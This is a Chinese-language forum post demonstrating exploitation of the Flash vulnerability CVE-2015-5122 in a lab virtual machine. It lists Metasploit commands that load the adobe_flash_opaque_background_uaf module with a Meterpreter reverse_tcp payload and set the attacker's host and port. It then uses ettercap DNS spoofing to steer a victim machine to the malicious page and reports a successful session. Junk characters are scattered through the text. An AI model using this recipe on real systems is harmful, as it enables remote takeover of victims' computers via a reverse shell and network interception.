cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

+ B- L$ d0 Q0 W: i& G 二、cve2015-5122漏洞实例演示虚拟机 0 _' U- P' I6 P7 U) U0 q3 O

9 K; P( B6 g# c, A% {8 D# H$ c 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 0 e9 Q0 n" _$ I+ ~$ P" {9 F+ x

* C) {( a p: G; E7 l search cve-2015-5122如图： ( K" r$ W8 G" t

1 {8 M+ [6 q8 y6 E; G3 D 4 s2 }5 f" \& o1 f, z! |, v: L

. J# r2 Z0 b3 A" H 下面我们敲如下命令： V w/ }% P# d

; t8 o' Z+ [ z! I3 v use exploit/multi/browser/adobe_flash_opaque_background_uaf 9 F' c* k+ ]$ |* ~

( W# P3 _, F2 q& f3 F set PAYLOAD windows/meterpreter/reverse_tcp * N& g1 t7 e: n" G/ d

9 \1 v) t& n& k1 z8 w! b9 | set LHOST 192.168.0.109 ' f! }1 P9 ?1 f" p6 Q

0 a/ @/ }7 @/ w% H" P) M set URIPATH / /*根目录*/ 0 B* O ^3 W v6 @

: o4 u; ^$ Y3 I' l4 r2 s set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 8 f2 q9 n5 J* ?' @" [. v

$ H4 Z7 v- `7 d+ N set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' l+ b0 x# l: |

7 a# n, s6 a) _ 然后show options如图： 8 Z2 w7 t8 q* _2 H

3 w0 k% H& a, _3 M1 C( { 5 }9 W- E1 F& k

9 Y9 E& \! j- _9 N" Q( Y 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
. J5 W7 `2 |9 p* {6 `- n3 a9 K' A 9 p3 l. x$ {, ]$ W# p/ r. l

8 Y O. S; W8 [ I) R8 ] 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ; b: s0 ?. Q1 a3 Q' G, j1 K

9 J \$ n6 x- w6 }# y Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf / p6 x. ]/ R( Z' p$ Z: z

1 F6 F2 f# ?; p2 D2 z & g, A1 |" D8 G: e/ q

4 b. Q2 l2 ~5 q1 c# x 成功了，这时候我们断开ettercap，如图： + O$ ?, a% L8 s9 z. b4 Q

" Q: \. T% c5 i/ D( ^% y , q9 Z1 C4 F1 P0 `5 \ K$ M0 @

& {- p% n) ~0 L+ B; | Screenshot如图： ; ^" h% Z) x* u2 G) Q. l4 @ D$ [

) N% [8 j% D& ]9 V' \+ y7 | , i! Y) y4 L j' u% R

0 {1 ?# b7 l, S; z/ v% q & x! i6 ^3 C! W% b1 _* V; m. C3 I2 f

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块